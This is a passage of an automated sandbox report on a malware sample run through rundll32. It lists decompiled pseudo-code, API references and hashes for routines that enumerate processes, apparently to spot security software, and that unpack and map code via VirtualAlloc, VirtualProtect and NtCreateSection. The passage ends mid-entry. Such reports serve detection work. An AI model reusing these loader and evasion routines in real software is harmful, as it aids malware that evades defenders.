0x032957a6
0x032957a6
0x032957aa
0x00000000
0x00000000
0x032957a1
0x032957a2
0x032957a5
0x032957a5
0x032957b2
0x032957b9
0x032957bd
0x032957c5
0x032957cb
0x032957cd
0x032957d2
0x032957d6
0x032957d8
0x032957db
0x032957e2
0x032957e2
0x032957ec
0x032957ef
0x032957f2
0x032957f2
0x032957fe
0x032957fe
0x0329580b

APIs

StrChrA.SHLWAPI(?,00000020,00000000,053E962C,?,?,?,03291128,053E962C,?,?,032955D3), ref: 032957A6
StrTrimA.SHLWAPI(?,032992A4,00000002,?,?,?,03291128,053E962C,?,?,032955D3), ref: 032957C5
StrChrA.SHLWAPI(?,00000020,?,?,?,03291128,053E962C,?,?,032955D3,?,?,?,?,?,03296BD8), ref: 032957D0
StrTrimA.SHLWAPI(00000001,032992A4,?,?,?,03291128,053E962C,?,?,032955D3,?,?,?,?,?,03296BD8), ref: 032957E2

Memory Dump Source

Source File: 00000007.00000002.481311716.0000000003291000.00000020.00000001.sdmp, Offset: 03290000, based on PE: true

Associated: 00000007.00000002.481294536.0000000003290000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.481340469.0000000003299000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.481359865.000000000329A000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.481378438.000000000329C000.00000002.00000001.sdmp Download File

Similarity

API ID: Trim
String ID:
API String ID: 3043112668-0
Opcode ID: 68f3cdfb8ddbce9fb1603d16dfcf1eeb186c23a03f5f40891792939e90648874
Instruction ID: 6e94c0cc9d3c79ea15bf47145709a0227cc8282ab36fb3ab6dee842926ff39bb
Opcode Fuzzy Hash: 68f3cdfb8ddbce9fb1603d16dfcf1eeb186c23a03f5f40891792939e90648874
Instruction Fuzzy Hash: C50192717153269FE721DB65AC49E2BBA98FF8AA60F25055AF841DB240DBB0C84186A0

Uniqueness

Uniqueness Score: -1.00%

Function 0329513E, Relevance: 6.0, APIs: 4, Instructions: 41
processCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E0329513E() {
				char _v264;
				void* _v300;
				int _t8;
				intOrPtr _t9;
				int _t15;
				void* _t17;

				_t15 = 0;
				_t17 = CreateToolhelp32Snapshot(2, 0);
				if(_t17 != 0) {
					_t8 = Process32First(_t17,  &_v300);
					while(_t8 != 0) {
						_t9 =  *0x329a2d4; // 0x214d5a8
						_t2 = _t9 + 0x329bdd4; // 0x73617661
						_push( &_v264);
						if( *0x329a118() != 0) {
							_t15 = 1;
						} else {
							_t8 = Process32Next(_t17,  &_v300);
							continue;
						}
						L7:
						CloseHandle(_t17);
						goto L8;
					}
					goto L7;
				}
				L8:
				return _t15;
			}

0x03295149
0x03295153
0x03295157
0x03295161
0x03295192
0x03295168
0x0329516d
0x0329517a
0x03295183
0x0329519a
0x03295185
0x0329518d
0x00000000
0x0329518d
0x0329519b
0x0329519c
0x00000000
0x0329519c
0x00000000
0x03295196
0x032951a2
0x032951a7

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0329514E
Process32First.KERNEL32(00000000,?), ref: 03295161
Process32Next.KERNEL32(00000000,?), ref: 0329518D
CloseHandle.KERNEL32(00000000), ref: 0329519C

Memory Dump Source

Source File: 00000007.00000002.481311716.0000000003291000.00000020.00000001.sdmp, Offset: 03290000, based on PE: true

Associated: 00000007.00000002.481294536.0000000003290000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.481340469.0000000003299000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.481359865.000000000329A000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.481378438.000000000329C000.00000002.00000001.sdmp Download File

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: 1f62734c48f9359a5a1e4b70004856b572bcad6381472e95eeafbf406d95fc7a
Instruction ID: 2c96d81350c12ebdfa0dcf9edb12fe8a272da5e53d88b3a02f9e469498ab7b4d
Opcode Fuzzy Hash: 1f62734c48f9359a5a1e4b70004856b572bcad6381472e95eeafbf406d95fc7a
Instruction Fuzzy Hash: 02F0BB357112256AFF22F766EC48DDB77ACDFC6B10F040163F955C6000E67489D686B1

Uniqueness

Uniqueness Score: -1.00%

Function 02F11F10, Relevance: 6.0, APIs: 4, Instructions: 34
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E02F11F10() {
				void* _t1;
				long _t3;
				void* _t4;
				long _t5;
				void* _t6;
				intOrPtr _t8;

				_t8 =  *0x2f141b0;
				_t1 = CreateEventA(0, 1, 0, 0);
				 *0x2f141bc = _t1;
				if(_t1 == 0) {
					return GetLastError();
				}
				_t3 = GetVersion();
				if(_t3 <= 5) {
					_t4 = 0x32;
					return _t4;
				} else {
					 *0x2f141ac = _t3;
					_t5 = GetCurrentProcessId();
					 *0x2f141a8 = _t5;
					 *0x2f141b0 = _t8;
					_t6 = OpenProcess(0x10047a, 0, _t5);
					 *0x2f141a4 = _t6;
					if(_t6 == 0) {
						 *0x2f141a4 =  *0x2f141a4 | 0xffffffff;
					}
					return 0;
				}
			}

0x02f11f11
0x02f11f1f
0x02f11f27
0x02f11f2c
0x02f11f76
0x02f11f76
0x02f11f2e
0x02f11f36
0x02f11f72
0x02f11f74
0x02f11f38
0x02f11f38
0x02f11f3d
0x02f11f4b
0x02f11f50
0x02f11f56
0x02f11f5e
0x02f11f63
0x02f11f65
0x02f11f65
0x02f11f6f
0x02f11f6f

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,02F11C8E,74B063F0,00000000), ref: 02F11F1F
GetVersion.KERNEL32 ref: 02F11F2E
GetCurrentProcessId.KERNEL32 ref: 02F11F3D
OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 02F11F56

Memory Dump Source

Source File: 00000007.00000002.480547433.0000000002F11000.00000020.00020000.sdmp, Offset: 02F10000, based on PE: true

Associated: 00000007.00000002.480531790.0000000002F10000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.480565310.0000000002F13000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.480582200.0000000002F15000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.480603413.0000000002F16000.00000002.00020000.sdmp Download File

Similarity

API ID: Process$CreateCurrentEventOpenVersion
String ID:
API String ID: 845504543-0
Opcode ID: 28489b21b15c2bb1b6a94d028c7e00cad780b178a566ca24738ee31573fb2fe7
Instruction ID: 5bded77716060a4bdf818dbed7af49ad8b99a1d40ee099d6a4dadbc7772790f9
Opcode Fuzzy Hash: 28489b21b15c2bb1b6a94d028c7e00cad780b178a566ca24738ee31573fb2fe7
Instruction Fuzzy Hash: 9BF09A70EC4248AFF7128F69BC09786BBE4B744BD5FA308AAF255F91C0D3B040618B14

Uniqueness

Uniqueness Score: -1.00%

Function 03295076, Relevance: 6.0, APIs: 4, Instructions: 29
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E03295076() {
				void* _t1;
				intOrPtr _t5;
				void* _t6;
				void* _t7;
				void* _t11;

				_t1 =  *0x329a2c4; // 0x324
				if(_t1 == 0) {
					L8:
					return 0;
				}
				SetEvent(_t1);
				_t11 = 0x7fffffff;
				while(1) {
					SleepEx(0x64, 1);
					_t5 =  *0x329a308; // 0x0
					if(_t5 == 0) {
						break;
					}
					_t11 = _t11 - 0x64;
					if(_t11 > 0) {
						continue;
					}
					break;
				}
				_t6 =  *0x329a2c4; // 0x324
				if(_t6 != 0) {
					CloseHandle(_t6);
				}
				_t7 =  *0x329a290; // 0x4ff0000
				if(_t7 != 0) {
					HeapDestroy(_t7);
				}
				goto L8;
			}

0x03295076
0x0329507d
0x032950c7
0x032950c9
0x032950c9
0x03295081
0x03295087
0x0329508c
0x03295090
0x03295096
0x0329509d
0x00000000
0x00000000
0x0329509f
0x032950a4
0x00000000
0x00000000
0x00000000
0x032950a4
0x032950a6
0x032950ae
0x032950b1
0x032950b1
0x032950b7
0x032950be
0x032950c1
0x032950c1
0x00000000

APIs

SetEvent.KERNEL32(00000324,00000001,032956C9), ref: 03295081
SleepEx.KERNEL32(00000064,00000001), ref: 03295090
CloseHandle.KERNEL32(00000324), ref: 032950B1
HeapDestroy.KERNEL32(04FF0000), ref: 032950C1

Memory Dump Source

Source File: 00000007.00000002.481311716.0000000003291000.00000020.00000001.sdmp, Offset: 03290000, based on PE: true

Associated: 00000007.00000002.481294536.0000000003290000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.481340469.0000000003299000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.481359865.000000000329A000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.481378438.000000000329C000.00000002.00000001.sdmp Download File

Similarity

API ID: CloseDestroyEventHandleHeapSleep
String ID:
API String ID: 4109453060-0
Opcode ID: e8cfdb167cd62332c46fa8857b29b0cf4d74494faeef6e71aff523f7e9bf863a
Instruction ID: 71b669b14a43eb2b2fb296d041d690d873b29be93cd1989b73040e276c472513
Opcode Fuzzy Hash: e8cfdb167cd62332c46fa8857b29b0cf4d74494faeef6e71aff523f7e9bf863a
Instruction Fuzzy Hash: 93F03031F113129BFF31BB35F84CB5A77A8AB0AB61B1A815BBC14DB188DB25D4948990

Uniqueness

Uniqueness Score: -1.00%

Function 032910DD, Relevance: 6.0, APIs: 4, Instructions: 29
sleepmemoryCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E032910DD(void** __esi) {
				char* _v0;
				intOrPtr _t4;
				intOrPtr _t6;
				void* _t8;
				intOrPtr _t11;
				void* _t12;
				void** _t14;

				_t14 = __esi;
				_t4 =  *0x329a37c; // 0x53e9630
				__imp__(_t4 + 0x40);
				while(1) {
					_t6 =  *0x329a37c; // 0x53e9630
					_t1 = _t6 + 0x58; // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t8 =  *_t14;
				if(_t8 != 0 && _t8 != 0x329a030) {
					HeapFree( *0x329a290, 0, _t8);
				}
				_t14[1] = E0329578C(_v0, _t14);
				_t11 =  *0x329a37c; // 0x53e9630
				_t12 = _t11 + 0x40;
				__imp__(_t12);
				return _t12;
			}

0x032910dd
0x032910dd
0x032910e6
0x032910f6
0x032910f6
0x032910fb
0x03291100
0x00000000
0x00000000
0x032910f0
0x032910f0
0x03291102
0x03291106
0x03291118
0x03291118
0x03291128
0x0329112b
0x03291130
0x03291134
0x0329113a

APIs

RtlEnterCriticalSection.NTDLL(053E95F0), ref: 032910E6
Sleep.KERNEL32(0000000A,?,?,032955D3,?,?,?,?,?,03296BD8,?,00000001), ref: 032910F0
HeapFree.KERNEL32(00000000,00000000,?,?,032955D3,?,?,?,?,?,03296BD8,?,00000001), ref: 03291118
RtlLeaveCriticalSection.NTDLL(053E95F0), ref: 03291134

Memory Dump Source

Source File: 00000007.00000002.481311716.0000000003291000.00000020.00000001.sdmp, Offset: 03290000, based on PE: true

Associated: 00000007.00000002.481294536.0000000003290000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.481340469.0000000003299000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.481359865.000000000329A000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.481378438.000000000329C000.00000002.00000001.sdmp Download File

Similarity

API ID: CriticalSection$EnterFreeHeapLeaveSleep
String ID:
API String ID: 58946197-0
Opcode ID: 80127e9308bce1b20663ea9eca3fdee08c8955e2e41235972c89a1411b495d0c
Instruction ID: a89091ad2f6dcdd71dcbca19c89761ca1f89d82ad193f1103d95ed33de984efb
Opcode Fuzzy Hash: 80127e9308bce1b20663ea9eca3fdee08c8955e2e41235972c89a1411b495d0c
Instruction Fuzzy Hash: 71F0DA742112429BEB21EB7AF94DB1A77A8AB09740B05C407F955C7255C721E890CB29

Uniqueness

Uniqueness Score: -1.00%

Function 032950DF, Relevance: 6.0, APIs: 4, Instructions: 28
sleepmemoryCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E032950DF() {
				void* _v0;
				void** _t3;
				void** _t5;
				void** _t7;
				void** _t8;
				void* _t10;

				_t3 =  *0x329a37c; // 0x53e9630
				__imp__( &(_t3[0x10]));
				while(1) {
					_t5 =  *0x329a37c; // 0x53e9630
					_t1 =  &(_t5[0x16]); // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t7 =  *0x329a37c; // 0x53e9630
				_t10 =  *_t7;
				if(_t10 != 0 && _t10 != 0x329b83e) {
					HeapFree( *0x329a290, 0, _t10);
					_t7 =  *0x329a37c; // 0x53e9630
				}
				 *_t7 = _v0;
				_t8 =  &(_t7[0x10]);
				__imp__(_t8);
				return _t8;
			}

0x032950df
0x032950e8
0x032950f8
0x032950f8
0x032950fd
0x03295102
0x00000000
0x00000000
0x032950f2
0x032950f2
0x03295104
0x03295109
0x0329510d
0x03295120
0x03295126
0x03295126
0x0329512f
0x03295131
0x03295135
0x0329513b

APIs

RtlEnterCriticalSection.NTDLL(053E95F0), ref: 032950E8
Sleep.KERNEL32(0000000A,?,?,032955D3,?,?,?,?,?,03296BD8,?,00000001), ref: 032950F2
HeapFree.KERNEL32(00000000,?,?,?,032955D3,?,?,?,?,?,03296BD8,?,00000001), ref: 03295120
RtlLeaveCriticalSection.NTDLL(053E95F0), ref: 03295135

Memory Dump Source

Source File: 00000007.00000002.481311716.0000000003291000.00000020.00000001.sdmp, Offset: 03290000, based on PE: true

Associated: 00000007.00000002.481294536.0000000003290000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.481340469.0000000003299000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.481359865.000000000329A000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.481378438.000000000329C000.00000002.00000001.sdmp Download File

Similarity

API ID: CriticalSection$EnterFreeHeapLeaveSleep
String ID:
API String ID: 58946197-0
Opcode ID: 7fadbde9baa9aa1f8593b8201674eb4b746395b5ecdadf5b1cc2d1257f7ca60d
Instruction ID: 2bea810078e5e3d05371ec4b4a6c57a684d83312a28adbf51f92ddb72febb544
Opcode Fuzzy Hash: 7fadbde9baa9aa1f8593b8201674eb4b746395b5ecdadf5b1cc2d1257f7ca60d
Instruction Fuzzy Hash: B1F0D474310201DFFB19EB24F95DB2577A4AB4D711B16C01BED12C7358C731A880CA24

Uniqueness

Uniqueness Score: -1.00%

Function 02F505D0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 54COMMON

Download Yara Rule

APIs

__encode_pointer.LIBCMTD ref: 02F50644
_ValidateRead.LIBCMTD ref: 02F50659

Strings

csm, xrefs: 02F505D9

Memory Dump Source

Source File: 00000007.00000002.480637946.0000000002F1E000.00000020.00020000.sdmp, Offset: 02F1E000, based on PE: false

Similarity

API ID: ReadValidate__encode_pointer
String ID: csm
API String ID: 977738414-1018135373
Opcode ID: 432f3554264c23c2b48faa28629ba8bb089f0a4bb88eb94ec4db92db742b4a74
Instruction ID: 326995dee4cfaa63d34f913e4c1b32c1068d43446303678b725c813928bfdfe4
Opcode Fuzzy Hash: 432f3554264c23c2b48faa28629ba8bb089f0a4bb88eb94ec4db92db742b4a74
Instruction Fuzzy Hash: 32117675A00229EBCB18CF64E45496A7BA6AF89388F50419CEF094F251CF31EA81CF91

Uniqueness

Uniqueness Score: -1.00%

Function 03293D98, Relevance: 5.1, APIs: 4, Instructions: 70
stringCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E03293D98(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
				intOrPtr* _v8;
				void* _t17;
				intOrPtr* _t22;
				void* _t27;
				char* _t30;
				void* _t33;
				void* _t34;
				void* _t36;
				void* _t37;
				void* _t39;
				int _t42;

				_t17 = __eax;
				_t37 = 0;
				__imp__(_a4, _t33, _t36, _t27, __ecx);
				_t2 = _t17 + 1; // 0x1
				_t28 = _t2;
				_t34 = E03296837(_t2);
				if(_t34 != 0) {
					_t30 = E03296837(_t28);
					if(_t30 == 0) {
						E032950CA(_t34);
					} else {
						_t39 = _a4;
						_t22 = E032977DD(_t39);
						_v8 = _t22;
						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
							_a4 = _t39;
						} else {
							_t26 = _t22 + 2;
							_a4 = _t22 + 2;
							_t22 = E032977DD(_t26);
							_v8 = _t22;
						}
						if(_t22 == 0) {
							__imp__(_t34, _a4);
							 *_t30 = 0x2f;
							 *((char*)(_t30 + 1)) = 0;
						} else {
							_t42 = _t22 - _a4;
							memcpy(_t34, _a4, _t42);
							 *((char*)(_t34 + _t42)) = 0;
							__imp__(_t30, _v8);
						}
						 *_a8 = _t34;
						_t37 = 1;
						 *_a12 = _t30;
					}
				}
				return _t37;
			}

0x03293d98
0x03293da2
0x03293da4
0x03293daa
0x03293daa
0x03293db3
0x03293db7
0x03293dc3
0x03293dc7
0x03293e3b
0x03293dc9
0x03293dc9
0x03293dcd
0x03293dd4
0x03293dd7
0x03293df1
0x03293de0
0x03293de0
0x03293de4
0x03293de7
0x03293dec
0x03293dec
0x03293df6
0x03293e1e
0x03293e24
0x03293e27
0x03293df8
0x03293dfa
0x03293e02
0x03293e0d
0x03293e12
0x03293e12
0x03293e2e
0x03293e35
0x03293e36
0x03293e36
0x03293dc7
0x03293e46

APIs

lstrlen.KERNEL32(00000000,0000EA60,?,00000008,?,?,03293CEE,00000000,00000000,00000000,053E9698,?,?,0329106E,?,053E9698), ref: 03293DA4

Part of subcall function 03296837: RtlAllocateHeap.NTDLL(00000000,00000000,03294197), ref: 03296843

Part of subcall function 032977DD: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,03293DD2,00000000,00000001,00000001,?,?,03293CEE,00000000,00000000,00000000,053E9698), ref: 032977EB
Part of subcall function 032977DD: StrChrA.SHLWAPI(?,0000003F,?,?,03293CEE,00000000,00000000,00000000,053E9698,?,?,0329106E,?,053E9698,0000EA60,?), ref: 032977F5

memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,03293CEE,00000000,00000000,00000000,053E9698,?,?,0329106E), ref: 03293E02
lstrcpy.KERNEL32(00000000,00000000), ref: 03293E12
lstrcpy.KERNEL32(00000000,00000000), ref: 03293E1E

Memory Dump Source

Source File: 00000007.00000002.481311716.0000000003291000.00000020.00000001.sdmp, Offset: 03290000, based on PE: true

Associated: 00000007.00000002.481294536.0000000003290000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.481340469.0000000003299000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.481359865.000000000329A000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.481378438.000000000329C000.00000002.00000001.sdmp Download File

Similarity

API ID: lstrcpy$AllocateHeaplstrlenmemcpy
String ID:
API String ID: 3767559652-0
Opcode ID: 04bcde7b82e7b1e15d3505ee85eb33aa0400113b19b9bc3d79ae34debf15dfff
Instruction ID: 0ddc9e6c235cf6d68abe44cb8a5a1283adaf625f0a80ec1695883efc911e1dad
Opcode Fuzzy Hash: 04bcde7b82e7b1e15d3505ee85eb33aa0400113b19b9bc3d79ae34debf15dfff
Instruction Fuzzy Hash: 7721D879520355AFDF12DF64C858AABBFF8EF05250B058056F9049F201D770C980C7E0

Uniqueness

Uniqueness Score: -1.00%

Function 03295D37, Relevance: 5.0, APIs: 4, Instructions: 39
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E03295D37(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				void* _v8;
				void* _t18;
				int _t25;
				int _t29;
				int _t34;

				_t29 = lstrlenW(_a4);
				_t25 = lstrlenW(_a8);
				_t18 = E03296837(_t25 + _t29 + _t25 + _t29 + 2);
				_v8 = _t18;
				if(_t18 != 0) {
					_t34 = _t29 + _t29;
					memcpy(_t18, _a4, _t34);
					_t10 = _t25 + 2; // 0x2
					memcpy(_v8 + _t34, _a8, _t25 + _t10);
				}
				return _v8;
			}

0x03295d4c
0x03295d50
0x03295d5a
0x03295d61
0x03295d64
0x03295d66
0x03295d6e
0x03295d73
0x03295d81
0x03295d86
0x03295d90

APIs

lstrlenW.KERNEL32(004F0053,?,74B05520,00000008,053E92FC,?,03291B37,004F0053,053E92FC,?,?,?,?,?,?,032920B0), ref: 03295D47
lstrlenW.KERNEL32(03291B37,?,03291B37,004F0053,053E92FC,?,?,?,?,?,?,032920B0), ref: 03295D4E

Part of subcall function 03296837: RtlAllocateHeap.NTDLL(00000000,00000000,03294197), ref: 03296843

memcpy.NTDLL(00000000,004F0053,74B069A0,?,?,03291B37,004F0053,053E92FC,?,?,?,?,?,?,032920B0), ref: 03295D6E
memcpy.NTDLL(74B069A0,03291B37,00000002,00000000,004F0053,74B069A0,?,?,03291B37,004F0053,053E92FC), ref: 03295D81

Memory Dump Source

Source File: 00000007.00000002.481311716.0000000003291000.00000020.00000001.sdmp, Offset: 03290000, based on PE: true

Associated: 00000007.00000002.481294536.0000000003290000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.481340469.0000000003299000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.481359865.000000000329A000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.481378438.000000000329C000.00000002.00000001.sdmp Download File

Similarity

API ID: lstrlenmemcpy$AllocateHeap
String ID:
API String ID: 2411391700-0
Opcode ID: b400ac6ce803c619d333e66fa6c2226bd347f9df1beee70036bacd0e328fec2b
Instruction ID: 288cce3eeb89bc6e154f3f4a9289f3c9185b20de37beb4972ab4ffa08e0c08bc
Opcode Fuzzy Hash: b400ac6ce803c619d333e66fa6c2226bd347f9df1beee70036bacd0e328fec2b
Instruction Fuzzy Hash: FDF04F76900118BBDF11EFA8CC84CCE7BECEF092647154067FA04DB101E775EA548BA0

Uniqueness

Uniqueness Score: -1.00%

Function 032921C1, Relevance: 5.0, APIs: 4, Instructions: 27stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(053E87FA,00000000,00000000,00000000,03297100,00000000), ref: 032921D1
lstrlen.KERNEL32(?), ref: 032921D9

Part of subcall function 03296837: RtlAllocateHeap.NTDLL(00000000,00000000,03294197), ref: 03296843

lstrcpy.KERNEL32(00000000,053E87FA), ref: 032921ED
lstrcat.KERNEL32(00000000,?), ref: 032921F8

Memory Dump Source

Source File: 00000007.00000002.481311716.0000000003291000.00000020.00000001.sdmp, Offset: 03290000, based on PE: true

Associated: 00000007.00000002.481294536.0000000003290000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.481340469.0000000003299000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.481359865.000000000329A000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.481378438.000000000329C000.00000002.00000001.sdmp Download File

Similarity

API ID: lstrlen$AllocateHeaplstrcatlstrcpy
String ID:
API String ID: 74227042-0
Opcode ID: db337a2ba74d3451bba2d81a29a1562e79981839677a6139f7691c9ef78a9058
Instruction ID: 6e55cd4ac2ab7c02c35ce116b89696b651f748f4a0edecd5a62257ea7234bb37
Opcode Fuzzy Hash: db337a2ba74d3451bba2d81a29a1562e79981839677a6139f7691c9ef78a9058
Instruction Fuzzy Hash: BAE09273901225A78711ABE4BC4CC9FBBACFF8D621309441BFA10D3104C720C855CBA1

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exe PID: 6132 Parent PID: 5364 rundll32.exeCOMMON

Executed Functions

Function 02F54F71, Relevance: 13.8, APIs: 9, Instructions: 318memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,00000941,00003000,00000040,00000941,02F549C8), ref: 02F5502E
VirtualAlloc.KERNEL32(00000000,00000056,00003000,00000040,02F54A2A), ref: 02F55065
VirtualAlloc.KERNEL32(00000000,0000C27B,00003000,00000040), ref: 02F550C5
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 02F550FB
VirtualProtect.KERNEL32(02EE0000,00000000,00000004,02F54F50), ref: 02F55200
VirtualProtect.KERNEL32(02EE0000,00001000,00000004,02F54F50), ref: 02F55227
VirtualProtect.KERNEL32(00000000,?,00000002,02F54F50), ref: 02F552F4
VirtualProtect.KERNEL32(00000000,?,00000002,02F54F50,?), ref: 02F5534A
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 02F55366

Memory Dump Source

Source File: 00000008.00000002.481665992.0000000002F54000.00000040.00020000.sdmp, Offset: 02F54000, based on PE: false

Similarity

API ID: Virtual$Protect$Alloc$Free
String ID:
API String ID: 2574235972-0
Opcode ID: 32be68320190b8bb7228a8e069a5c313f1a90531dfc18a59675f2d3a529aa34d
Instruction ID: f737c029d322b0b8ac1fe1942752073a246000d022c82c354e69ac13e8248b1c
Opcode Fuzzy Hash: 32be68320190b8bb7228a8e069a5c313f1a90531dfc18a59675f2d3a529aa34d
Instruction Fuzzy Hash: 92D19C73500610AFDB15CF16CAC0B5277A6FF68350B4D6194EE89AFB5AE370A850CB62

Uniqueness

Uniqueness Score: -1.00%

Function 02F15A90, Relevance: 6.3, APIs: 1, Strings: 2, Instructions: 1084COMMON

Download Yara Rule

Strings

I#, xrefs: 02F1647A
#, xrefs: 02F16649

Memory Dump Source

Source File: 00000008.00000002.481393628.0000000002EEE000.00000020.00020000.sdmp, Offset: 02EEE000, based on PE: false

Similarity

API ID:
String ID: #$I#
API String ID: 0-3815891943
Opcode ID: 2d72a8dc01098073034dfa2aa8b56e03e1c68670ef509345446a0543615c21f7
Instruction ID: f2f34fc6100bca8d8c5a2a63b6e4d639f96600618b1256e2d7c619d694d26300
Opcode Fuzzy Hash: 2d72a8dc01098073034dfa2aa8b56e03e1c68670ef509345446a0543615c21f7
Instruction Fuzzy Hash: 74A2E072D843698FC728CF1CD990264FBA6AF84BCCB8548AED74587251D330956ECF91

Uniqueness

Uniqueness Score: -1.00%

Function 02EE1B9C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70
nativeCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E02EE1B9C(intOrPtr* __eax, void** _a4) {
				int _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				int _v28;
				int _v32;
				intOrPtr _v36;
				int _v40;
				int _v44;
				void* _v48;
				void* __esi;
				long _t34;
				void* _t39;
				void* _t47;
				intOrPtr* _t48;

				_t48 = __eax;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v24 =  *((intOrPtr*)(__eax + 4));
				_v16 = 0;
				_v12 = 0;
				_v48 = 0x18;
				_v44 = 0;
				_v36 = 0x40;
				_v40 = 0;
				_v32 = 0;
				_v28 = 0;
				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
				if(_t34 < 0) {
					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
				} else {
					 *_t48 = _v16;
					_t39 = E02EE1EC7(_t48,  &_v12); // executed
					_t47 = _t39;
					if(_t47 != 0) {
						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
					} else {
						memset(_v12, 0, _v24);
						 *_a4 = _v12;
					}
				}
				return _t47;
			}

0x02ee1ba5
0x02ee1bac
0x02ee1bad
0x02ee1bae
0x02ee1baf
0x02ee1bb0
0x02ee1bc1
0x02ee1bc5
0x02ee1bd9
0x02ee1bdc
0x02ee1bdf
0x02ee1be6
0x02ee1be9
0x02ee1bf0
0x02ee1bf3
0x02ee1bf6
0x02ee1bf9
0x02ee1bfe
0x02ee1c39
0x02ee1c00
0x02ee1c03
0x02ee1c09
0x02ee1c0e
0x02ee1c12
0x02ee1c30
0x02ee1c14
0x02ee1c1b
0x02ee1c29
0x02ee1c29
0x02ee1c12
0x02ee1c41

APIs

NtCreateSection.NTDLL(00000002,000F001F,?,?,?,08000000,00000000,74B04EE0,00000000,00000000,?), ref: 02EE1BF9

Part of subcall function 02EE1EC7: NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,02EE1C0E,00000002,00000000,?,?,00000000,?,?,02EE1C0E,00000000), ref: 02EE1EF4

memset.NTDLL ref: 02EE1C1B

Strings

@, xrefs: 02EE1BE9

Memory Dump Source

Source File: 00000008.00000002.481313094.0000000002EE1000.00000020.00020000.sdmp, Offset: 02EE0000, based on PE: true

Associated: 00000008.00000002.481305567.0000000002EE0000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.481330085.0000000002EE3000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.481340126.0000000002EE5000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.481360492.0000000002EE6000.00000002.00020000.sdmp Download File

Similarity

API ID: Section$CreateViewmemset
String ID: @
API String ID: 2533685722-2766056989
Opcode ID: 4d7eee9f11a7039b7ba48ef3c3db40ff58bda86e38dd00c02ef6a9748d42a3ba
Instruction ID: abf8e2076af6d08af231f8d55dc40fe72290c102f621fc63d281c6332676f4c9
Opcode Fuzzy Hash: 4d7eee9f11a7039b7ba48ef3c3db40ff58bda86e38dd00c02ef6a9748d42a3ba
Instruction Fuzzy Hash: 19210BB1D0020DAFCB11DFA9C8849EEFBF9FB48354F108869E616F7210D735AA458B64

Uniqueness

Uniqueness Score: -1.00%

Function 02EE1EC7, Relevance: 1.5, APIs: 1, Instructions: 34
nativeCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E02EE1EC7(void** __esi, PVOID* _a4) {
				long _v8;
				void* _v12;
				void* _v16;
				long _t13;

				_v16 = 0;
				asm("stosd");
				_v8 = 0;
				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
				if(_t13 < 0) {
					_push(_t13);
					return __esi[6]();
				}
				return 0;
			}

0x02ee1ed9
0x02ee1edf
0x02ee1eed
0x02ee1ef4
0x02ee1ef9
0x02ee1eff
0x00000000
0x02ee1f00
0x00000000

APIs

